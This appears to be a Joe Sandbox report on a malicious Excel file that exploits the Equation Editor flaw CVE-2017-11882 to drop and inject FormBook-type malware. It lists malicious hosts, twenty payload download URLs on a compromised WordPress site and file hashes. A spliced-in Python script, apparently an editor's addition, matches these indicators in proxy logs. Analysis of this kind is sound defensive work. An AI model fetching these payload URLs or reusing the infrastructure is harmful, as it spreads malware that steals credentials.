|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Scripting | Path Interception | 512 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 5 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 1 System Shutdown/Reboot | Acquire Infrastructure | Gather Victim Identity Information |
| Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | Exfiltration Over Bluetooth | 1 Encrypted Channel | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials |
| Domain Accounts | 1 Shared Modules | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 127 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 3 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses |
| Local Accounts | 23 Exploitation for Client Execution | Login Hook | Login Hook | 1 Software Packing | NTDS | 141 Security Software Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 113 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names |
| Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rootkit | LSA Secrets | 2 Virtualization/Sandbox Evasion | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information |
| Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties |
| External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS |
| Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 512 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | | | Defacement | Serverless | Network Trust Dependencies |
Behavior Graph ID: 1342301 | Sample: RFQ-T56797W_1.xlsx | Start date: 14/11/2023 | Architecture: WINDOWS | Score: 100
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 14 other signatures

EXCEL.EXE (started; graph counters 53 12)
EQNEDT32.EXE (started; graph counter 11)
    network: mail.treeoflifeadventures.com 41.185.64.155, ports 49162 -> 80, GridhostZA, South Africa
    dropped: C:\Users\user\AppData\Roaming\word.exe (PE32)
    dropped: C:\Users\user\AppData\...\jakatrol2.1[1].exe (PE32)
    signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    word.exe (started; graph counter 17)
        dropped: C:\Users\user\AppData\...\oktuxvhtsq.exe (PE32)
        oktuxvhtsq.exe (started)
            signatures: Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); 2 other signatures
            oktuxvhtsq.exe (started, second instance)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected; graph counters 8 3)
                    network: www.narrativepages.com 103.224.212.212, ports 49164 -> 80, TRELLIAN-AS-APTrellianPtyLimitedAU, Australia
                    network: www.miamirealestatecommercial.com 206.188.193.211, ports 49170 -> 80, DEFENSE-NETUS, United States
                    network: 10 other IPs or domains
                    signature: System process connects to network (likely due to code injection or exploit)
                    chkdsk.exe (started)
                        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        cmd.exe (started)
                    autochk.exe (started)

Antivirus detection for the submitted sample (Source, Detection, Scanner, Label):
• RFQ-T56797W_1.xlsx: 63%, ReversingLabs, Document-Office.Exploit.CVE-2017-11882
• RFQ-T56797W_1.xlsx: 55%, Virustotal
• RFQ-T56797W_1.xlsx: 100%, Avira, EXP/CVE-2017-11882.Gen
Antivirus detection for dropped files (Source, Detection, Scanner):
• C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe: 100%, Joe Sandbox ML
No Antivirus matches
                                Joe Sandbox Version:38.0.0 Ammolite
                                Analysis ID:1342301
                                Start date and time:2023-11-14 13:25:07 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample file name:RFQ-T56797W_1.xlsx
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@14/7@9/7
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 152
                                • Number of non-executed functions: 151
                                Cookbook Comments:
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                • Override analysis time to 67923.0899862697 for current running targets taking high CPU consumption
                                • Override analysis time to 135846.179972539 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed; the report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
13:26:20 | API Interceptor | 114x Sleep call for process: EQNEDT32.EXE modified
13:26:26 | API Interceptor | 29x Sleep call for process: oktuxvhtsq.exe modified
13:26:31 | API Interceptor | 9268320x Sleep call for process: chkdsk.exe modified
13:26:33 | API Interceptor | 5127x Sleep call for process: explorer.exe modified
Match: 41.185.64.155
Associated Sample Name / URL | Detection | Threat Name | Context
RFQ-T56797W.xlsx | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/kongaby2.1.exe
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jucostam2.1.exe
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jujoptics2.1.exe
TN81804BM.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/strakonaj2.1.exe
SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtf | malicious | Unknown | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/lightisted2.1.exe
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jujukhanis2.1.exe
63611-RFQ.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/marikolock2.1.exe
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtf | malicious | AgentTesla, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/maxkujor2.1.exe
PO-AM2307586.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/finakolad2.1.exe
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtf | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/sukonted2.1.exe
Order_List.doc | malicious | Unknown | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/welterkonzo2.1.exe
Purchase_Order_No.1364.doc | malicious | AgentTesla | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/pqAlGyUFhqdKYsx.exe
Order_List.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/macwelter2.1.exe
Order_No_455100.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/windviewcikon2.1.exe
Quotation.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/macbomard2.1.exe
New_Request_B300.doc | malicious | Unknown | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/alleromac2.1.exe
Order_No_455100.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/romankon2.1.exe
Order_No_455100.doc | malicious | FormBook, NSISDropper | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/marcolite2.1.exe
SecuriteInfo.com.Exploit.CVE-2018-0798.4.23494.27107.rtf | malicious | Remcos | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/shekinga2.1.exe
SecuriteInfo.com.Exploit.CVE-2018-0798.4.30706.1643.rtf | malicious | Unknown | mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/shedremko2.1.exe
Match: parkingpage.namecheap.com
Associated Sample Name / URL | Detection | Threat Name | Context
9i6tQlNW5V.exe | malicious | FormBook | 91.195.240.19
130_xlsx.exe | malicious | FormBook | 91.195.240.19
NEW_ORDERS_scan_29012019.exe | malicious | FormBook | 91.195.240.19
PTDwRpT7xd.exe | malicious | FormBook | 91.195.240.19
PURCHASE_ORDERPOmt1904069_1.exe | malicious | FormBook | 91.195.240.19
October'23_Statement_of_Account.exe | malicious | FormBook | 91.195.240.19
Invoice_&_Banking_details.exe | malicious | FormBook | 91.195.240.19
Factura_de_proforma_pdf.exe | malicious | DBatLoader, FormBook | 91.195.240.19
BOK9897863546.exe | malicious | FormBook | 91.195.240.19
BB879OMOJHH.exe | malicious | FormBook | 91.195.240.19
Receipt!!_PDF.exe | malicious | FormBook | 91.195.240.19
Invoice_&_SOA_ready_for_dispatch.exe | malicious | FormBook | 91.195.240.19
DcVDfpyF4G.exe | malicious | FormBook | 91.195.240.19
61cQ2AJ5tR.exe | malicious | FormBook | 91.195.240.19
j7jbTHWTgi.exe | malicious | FormBook | 91.195.240.19
Swift#invoice6-15+PO7038.exe | malicious | FormBook | 91.195.240.19
INVOICE#20231025.exe | malicious | FormBook | 91.195.240.19
Purchase_Order_pdf.exe | malicious | FormBook, NSISDropper | 91.195.240.19
C65v45yjPwh3N8G.exe | malicious | FormBook | 91.195.240.19
DHL_Receipt_#9552756186.exe | malicious | FormBook | 91.195.240.19
Match: mail.treeoflifeadventures.com
Associated Sample Name / URL | Detection | Threat Name | Context
RFQ-T56797W.xlsx | malicious | FormBook, NSISDropper | 41.185.64.155
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
TN81804BM.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtf | malicious | Unknown | 41.185.64.155
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
63611-RFQ.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtf | malicious | AgentTesla, NSISDropper | 41.185.64.155
PO-AM2307586.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtf | malicious | FormBook, NSISDropper | 41.185.64.155
Order_List.doc | malicious | Unknown | 41.185.64.155
Purchase_Order_No.1364.doc | malicious | AgentTesla | 41.185.64.155
Order_List.doc | malicious | FormBook, NSISDropper | 41.185.64.155
Order_No_455100.doc | malicious | FormBook, NSISDropper | 41.185.64.155
Quotation.doc | malicious | FormBook, NSISDropper | 41.185.64.155
New_Request_B300.doc | malicious | Unknown | 41.185.64.155
Order_No_455100.doc | malicious | FormBook, NSISDropper | 41.185.64.155
Order_No_455100.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2018-0798.4.23494.27107.rtf | malicious | Remcos | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2018-0798.4.30706.1643.rtf | malicious | Unknown | 41.185.64.155
Match: Gridhost (ZA)
Associated Sample Name / URL | Detection | Threat Name | Context
RFQ-T56797W.xlsx | malicious | FormBook, NSISDropper | 41.185.64.155
q15vaZEspF.elf | malicious | Mirai, Moobot | 41.61.164.245
e74Xkt1ot5.elf | malicious | Mirai, Moobot | 41.61.153.7
GlBCE6IPE2.elf | malicious | Mirai, Moobot | 41.185.108.137
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
TN81804BM.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtf | malicious | Unknown | 41.185.64.155
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 41.185.64.155
AYSz5iu0AR.elf | malicious | Mirai | 41.61.26.229
63611-RFQ.doc | malicious | FormBook, NSISDropper | 41.185.64.155
HGi9IZO85i.elf | malicious | Mirai, Moobot | 41.185.126.148
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtf | malicious | AgentTesla, NSISDropper | 41.185.64.155
PO-AM2307586.doc | malicious | FormBook, NSISDropper | 41.185.64.155
SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtf | malicious | FormBook, NSISDropper | 41.185.64.155
https://msds.open.edu/signon/samsoff2.aspx?URL=https%3a%2f%2fbredenkamp.co.za%2f.home%2fauths%2f6Ed2%2flaYhB%2f%2f%2f%2fcHJpdmFjeW9mZmljZXJAcmljLm9yZw== | malicious | Unknown | 41.185.8.68
https://alcatrazsecurity.co.za/onte/?86550431 | malicious | Unknown | 41.185.8.145
Order_List.doc | malicious | Unknown | 41.185.64.155
Purchase_Order_No.1364.doc | malicious | AgentTesla | 41.185.64.155
Order_List.doc | malicious | FormBook, NSISDropper | 41.185.64.155
Match: TRELLIAN-AS-AP Trellian Pty Limited (AU)
Associated Sample Name / URL | Detection | Threat Name | Context
wM34vVyJ6k.exe | malicious | FormBook | 103.224.212.215
eKlJmvs8k7.exe | malicious | FormBook | 103.224.212.215
SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.14213.13511.exe | malicious | FormBook, NSISDropper | 103.224.212.214
Quotation.xls | malicious | FormBook | 103.224.212.217
015IXAXaPw.exe | malicious | FormBook | 103.224.212.215
003425425124526.exe | malicious | DBatLoader, FormBook | 103.224.212.213
Nuevo_orden_pdf.exe | malicious | FormBook | 103.224.212.213
mj0mo2csOj.exe | malicious | FormBook, NSISDropper | 103.224.212.216
yKiQrfqhGv.exe | malicious | FormBook | 103.224.182.242
7Xnc2OFmyt.exe | malicious | FormBook | 103.224.212.214
0uYM4xUmvi.exe | malicious | FormBook, NSISDropper | 103.224.212.214
SecuriteInfo.com.FileRepMalware.16340.31219.exe | malicious | FormBook, NSISDropper | 103.224.212.216
TN81804BM_Production.doc | malicious | FormBook, NSISDropper | 103.224.212.214
https://mafoodallergytraining.org/ | malicious | Unknown | 103.224.182.218
E-dekont.exe | malicious | FormBook, GuLoader | 103.224.212.217
SecuriteInfo.com.FileRepMalware.2839.30700.exe | malicious | FormBook, NSISDropper | 103.224.212.211
New_order_98987006305#.doc | malicious | FormBook, NSISDropper | 103.224.212.211
GCeHcfCef8.exe | malicious | FormBook | 103.224.212.210
PAGO_72094.exe | malicious | FormBook | 103.224.212.215
Audit_Confirmation_pdf.exe | malicious | FormBook | 103.224.212.216
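The contacted-hosts table and the context rows above together give a compact IOC set: six hosts the report marks malicious, one registrar parking page it marks as not malicious, and twenty download URLs on mail.treeoflifeadventures.com that differ only in their final file name. The Python below is an added example, not code from the Joe Sandbox report, that turns those values into a detection pass over proxy-log lines. The log layout (timestamp, source, destination IP, host, path, requesting process) and the four sample lines are constructed for the example; the rule that EQNEDT32.EXE never legitimately originates network traffic is the editor's own detection logic, not a statement taken from the report.

```python
"""Detection pass over proxy-log lines using the IOCs listed in the report:
hosts marked Malicious=true, the parked host marked Malicious=false, and the
second-stage download path shared by every context row for the stager host."""
import re
from dataclasses import dataclass

# Transcribed from the report's contacted-hosts table (Malicious == true).
MALICIOUS_HOSTS = {
    "41.185.64.155": "mail.treeoflifeadventures.com",
    "103.224.212.212": "www.narrativepages.com",
    "206.188.193.211": "www.miamirealestatecommercial.com",
    "38.11.36.68": "www.sxchenggu.com",
    "34.149.87.45": "td-ccm-neg-87-45.wixdns.net",
    "3.33.130.190": "centralngs.com",
}
# Marked Malicious == false in the report: a registrar parking page, context only.
PARKING_HOSTS = {"91.195.240.19": "parkingpage.namecheap.com"}

# Every context URL in the report shares this prefix; only the file name varies.
STAGER_HOST = "mail.treeoflifeadventures.com"
STAGER_PATH_RE = re.compile(
    r"^/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/[A-Za-z0-9_.\-]+\.exe$"
)
# Editor's rule (not from the report): the Equation Editor has no legitimate network use.
NO_NETWORK_PROCESSES = {"eqnedt32.exe"}

# Assumed log layout, constructed for this example: ts src dst host path process
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<host>\S+) (?P<path>\S+) (?P<proc>\S+)$"
)


@dataclass
class Alert:
    line_no: int
    severity: str
    reasons: list


def classify(line_no: int, line: str):
    """Return an Alert for one log line, or None when nothing in the line matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    dst, host, path, proc = m["dst"], m["host"].lower(), m["path"], m["proc"].lower()
    reasons = []
    if dst in MALICIOUS_HOSTS or host in MALICIOUS_HOSTS.values():
        reasons.append("destination listed as malicious in the sandbox report")
    if host == STAGER_HOST and STAGER_PATH_RE.match(path):
        reasons.append("request path matches the second-stage download pattern")
    process_hit = proc in NO_NETWORK_PROCESSES
    if process_hit:
        reasons.append(f"{proc} should never originate network traffic")
    parking_hit = dst in PARKING_HOSTS or host in PARKING_HOSTS.values()
    if parking_hit:
        reasons.append("registrar parking page (not malicious per report)")
    ioc_hits = len(reasons) - int(process_hit) - int(parking_hit)
    # A network-capable Equation Editor is the strongest signal on its own;
    # an IOC hit from any other process is worth a look; a parked page is noise.
    if process_hit:
        severity = "high"
    elif ioc_hits:
        severity = "medium"
    elif parking_hit:
        severity = "low"
    else:
        return None
    return Alert(line_no, severity, reasons)


def scan(lines):
    """Classify every line and keep the ones that produced an alert, in log order."""
    return [a for a in (classify(n, line) for n, line in enumerate(lines, 1)) if a]


# Constructed sample log; the first line mirrors the kongaby2.1.exe context row.
SAMPLE_LOG = [
    "2023-11-14T12:26:25Z 10.0.0.5 41.185.64.155 mail.treeoflifeadventures.com "
    "/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/kongaby2.1.exe EQNEDT32.EXE",
    "2023-11-14T12:26:40Z 10.0.0.5 91.195.240.19 parkingpage.namecheap.com / explorer.exe",
    "2023-11-14T12:26:41Z 10.0.0.5 103.224.212.212 www.narrativepages.com / explorer.exe",
    "2023-11-14T12:30:00Z 10.0.0.7 203.0.113.10 www.example.com / chrome.exe",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Matching on both the destination IP and the host name matters here: the same domain resolves to different addresses across the context tables (the Trellian rows alone span 103.224.212.210 through .217), so an IP-only blocklist built from one report misses the next run of the same campaign, while the stager path prefix survived twenty differently named payloads.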
                                No context
                                No context
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Category:dropped
                                Size (bytes):400516
                                Entropy (8bit):7.871791543277087
                                Encrypted:false
                                SSDEEP:6144:BBlL/NXMMK36zVS2WGWZu3B8W8ee5ssX8dsuM7AjWe/7mr027RSPII41hnDHjD+p:HfrKqz02XSHscDcP/7mAgSPI5DDD+p
                                MD5:AFFC03992E31B5D4324B41CBD40D911E
                                SHA1:8C3138D444CA823DA937022FE29CB421B243A076
                                SHA-256:6F0AED190A415542A227D4DED6FF390ED8FBC0759B75E5BAEC91BD6C9C3FA752
                                SHA-512:CD5B37C2C0A2CF8594C904084B2C3BDFFC9729B01B79B2135F903F21F502E9C41E8003DCD91DA6D87987DA62EEACC6FB075AE2EC3C901ECF9BE2FDFDF482CA1A
                                Malicious:true
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Cannot read section info
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.1464700112623651
                                Encrypted:false
                                SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\word.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):265216
                                Entropy (8bit):6.485367625505907
                                Encrypted:false
                                SSDEEP:6144:DCa08z788ULY36Y4+n/53FIzK2pAOObTlg:Ww78856WF2pMl
                                MD5:CF92A3EC74E407574A58BCF121BEC4F1
                                SHA1:D117FA6B64E68EA1F24A030153D8BF3F160CB254
                                SHA-256:5165CE18A6AA81AE39B901D1AE017BDF4F4B6B2D984B97D6984C8B4B9FB1F652
                                SHA-512:172171AD3BB7AFC1AF81EC69C42EACBF8D1D3197B8381F392FE650134FDDACBF7DF687E966C36221BD077BE263A24A7173377EDF5A52667178824F050C48E3AB
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&/..H|..H|..H|..K}..H|..M}Q.H|..L}..H|S.K}..H|S.M}..H|S.L}..H|..I}..H|..I|z.H|I.M}..H|I.J}..H|Rich..H|........................PE..L.....Re.....................J....................@..........................P......................................................................................0...T..............................@............................................text............................... ..`.rdata..R...........................@..@.data....9.......*..................@....gfids.......0......................@..@.tls.........@......................@...........................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\word.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):209934
                                Entropy (8bit):7.992128423585276
                                Encrypted:true
                                SSDEEP:3072:Nm2BowKOqiLmXLw/q0Thw1uYcHFj1UrjjXOmb36STLNQUytr1UWouwDY3PZn8TGo:HJ69oHTUrjdtqEuwU3Bn8Hp
                                MD5:2D23E7AB5BFB49D8D5C66C4551E9763E
                                SHA1:9ED89848DE588F204C4AA29878D0AA26C7161239
                                SHA-256:671AD33D741EB3A83C2A7CC13C40E9E1FDB2C3CF3DB9D3EA512991700F06D329
                                SHA-512:5B2AEC2DB904FDDD124C53D91263F664DE2CD038DB592741AB1FEA91AD0BB80847931D95D04AC907C2B6C11D876E42819A1C1B629A4D3B37D9E115D8B50C860A
                                Malicious:false
                                Reputation:low
                                Preview:NI.(..a..ta}.b....t..Oame&.=[..H)......+....?..m.....Y.RW..G../..I$zS.......?......O...oN.g.....z..<jY.....1.7.p"ni|.W.._.../).......D.p..*.|}&...)l}A*._A...&4n$#...6.C4@g..|}.s.E....y..b..8..5.....K..NN........'.q.).....d.....>.[..J....a@.y....|.a...c.~...F8...U<.%c.j...$). ....+..v.?..m....>Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|#\...... [d..Z...Y.....K..5N..X.s.-$...q.)........n.>.@.J@....a..y..}.|.a.....~...F....|<.%c.jl..H)......+....?..m.....Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|}.s.E.......SZ...eY.....K..5N..X.s..$.'.q.)........n.>.@.J@....a..y..}.|.a.....~...F....|<.%c.jl..H)......+....?..m.....Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|}.s.E.......SZ...eY.....K..5N..X.s..$.'.q.)....
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1478656
                                Entropy (8bit):7.232314461325792
                                Encrypted:false
                                SSDEEP:24576:DQI/UZhXtvkMeLaA4mzgY0ezXvKJGLR/GnhYzW:jsZh9TeOnXJ/h
                                MD5:F772FD06411290F17EEFFF387B404E79
                                SHA1:EE88B130974D67810BB8C7BA8FB77993A22A48B0
                                SHA-256:FD4F3EB1AB0E9CE2580B082ECCCD3DB3EBFD51514F0127979C66E6DCAAADF7CA
                                SHA-512:8A4616941A8F58FEC7D4C09A88C8AA541C0EAEDD9FCCFE3F82156A21FFEB62908E025FEA9F269B02B056ADFB6C8A456467607FE05720C2E8FC6163DECDDB0DE7
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Category:dropped
                                Size (bytes):400516
                                Entropy (8bit):7.871791543277087
                                Encrypted:false
                                SSDEEP:6144:BBlL/NXMMK36zVS2WGWZu3B8W8ee5ssX8dsuM7AjWe/7mr027RSPII41hnDHjD+p:HfrKqz02XSHscDcP/7mAgSPI5DDD+p
                                MD5:AFFC03992E31B5D4324B41CBD40D911E
                                SHA1:8C3138D444CA823DA937022FE29CB421B243A076
                                SHA-256:6F0AED190A415542A227D4DED6FF390ED8FBC0759B75E5BAEC91BD6C9C3FA752
                                SHA-512:CD5B37C2C0A2CF8594C904084B2C3BDFFC9729B01B79B2135F903F21F502E9C41E8003DCD91DA6D87987DA62EEACC6FB075AE2EC3C901ECF9BE2FDFDF482CA1A
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
